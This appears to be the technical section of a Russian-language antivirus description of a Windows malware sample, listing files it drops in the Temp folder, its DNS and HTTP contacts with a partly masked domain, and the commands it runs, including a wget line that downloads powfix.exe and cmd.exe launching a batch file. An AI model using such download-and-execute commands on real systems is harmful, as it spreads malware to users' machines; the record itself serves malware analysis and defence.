Техническая информация
- '' (загружен из сети Интернет)
- %WINDIR%\Temp\SetACL32.exe
- %WINDIR%\Temp\subinacl.exe
- %WINDIR%\Temp\wget.exe
- %WINDIR%\Temp\1.bat
- %WINDIR%\Temp\powfix.exe
- %WINDIR%\Temp\subinacl.exe
- 'mf##r.com':80
- http://www.mf##r.com/t/powfix.exe via mf##r.com
- DNS ASK www.mf##r.com
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\Temp\wget.exe' -c http://www.mf##r.com/t/powfix.exe
- '%WINDIR%\Temp\powfix.exe'
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\temp\1.bat" "